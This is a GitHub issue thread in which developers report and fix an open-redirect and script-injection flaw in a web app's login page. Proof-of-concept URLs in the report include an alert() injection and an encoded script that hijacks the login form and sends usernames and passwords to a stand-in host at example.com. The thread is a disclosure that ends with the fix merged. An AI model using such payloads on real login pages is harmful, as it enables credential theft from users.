### ISSUE TITLE
make login redirect URL relative to current host

### ISSUE THREAD

**Issue by alxndrsn** [medic/medic-webapp#1098]
# Observed
Login page can be made to redirect to random URLs:

* <a href="http://localhost:5988/medic/login?redirect=http%3A%2F%2Fexample.com%2Fevil">an example of a redirect to an unexpected place</a>

And also allows javascript injection:

* <a href="http://localhost:5988/medic/login/?redirect=%22%3E%3Cscript%3Ealert%28%27hello%27%29%3C/script%3E">an example of JS injection</a>

# Suggested fix
* only redirect to relative URLs (or absolute URLs on the same host)
* escape contents of `data-redirect` attribute

# Notes
Might be safest to restrict to relative URLs _in the current couch db_

**Comment by alxndrsn** [comment]
More fun stuff:
```http://localhost:5988/medic/login/?redirect=%22%3E%3Cscript%3Ealert%28%27hello%27%29%3C/script%3E```

**Comment by alxndrsn** [comment]
Step 1 is probably to use `escape` instead of `interpolate` in the underscore templates.  Although then, to unescape it would be simplest to have access to `_.unescape()`.

**Comment by browndav** [comment]
I'd probably prefer using avoiding the URL altogether and just using keywords that we map to URLs internally. More here: https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

**Comment by browndav** [comment]
I guess if we have an open-ended number of return destinations the whole "just use a URL whitelist" comment above doesn't really work. But we should definitely enforce relative-URLs-only at a minimum.

**Comment by alxndrsn** [comment]
http://localhost:5988/medic/login/?redirect=%22%3E%3Cscript%3EsetTimeout%28function%28%29{var%20login%20=%20document.getElementById%28%27login%27%29;%20login.removeEventListener%28%27click%27,submit%29;%20var%20newSubmit%20=%20function%28%29{if%28document.getElementById%28%27form%27%29.className%20===%20%27loading%27%29{return;}setState%28%27loading%27%29;%20var%20user%20=%20document.getElementById%28%27user%27%29.value;var%20password%20=%20document.getElementById%28%27password%27%29.value;var%20xmlhttp%20=%20new%20XMLHttpRequest%28%29;xmlhttp.onreadystatechange%20=%20function%28%29{if%28xmlhttp.readyState%20===%20XMLHttpRequest.DONE%29{handleResponse%28xmlhttp%29;}};xmlhttp.open%28%27GET%27,%27http://example.com/bad/-u-/-p-%27.replace%28%27-u-%27,user%29.replace%28%27-p-%27,password%29,true%29;xmlhttp.send%28createPayload%28user,password%29%29;};%20login.addEventListener%28%27click%27,newSubmit,true%29;},3%29;%3C/script%3E%3Cdiv%20class=%22

**Comment by alxndrsn** [comment]
:)

**Comment by alxndrsn** [comment]
PRs submitted:
https://github.com/medic/medic-api/pull/24
https://github.com/medic/medic-api/pull/25

**Comment by garethbowen** [comment]
PRs reviewed - reassigning back to @alxndrsn

**Comment by browndav** [comment]
Thanks, good catch on the other absolute paths.

**Comment by browndav** [comment]
Remaining to-dos are over here: https://github.com/medic/medic-api/pull/25#issuecomment-124252817

**Comment by alxndrsn** [comment]
Updated.

**Comment by browndav** [comment]
Reviewed; LGTM. I'll merge.
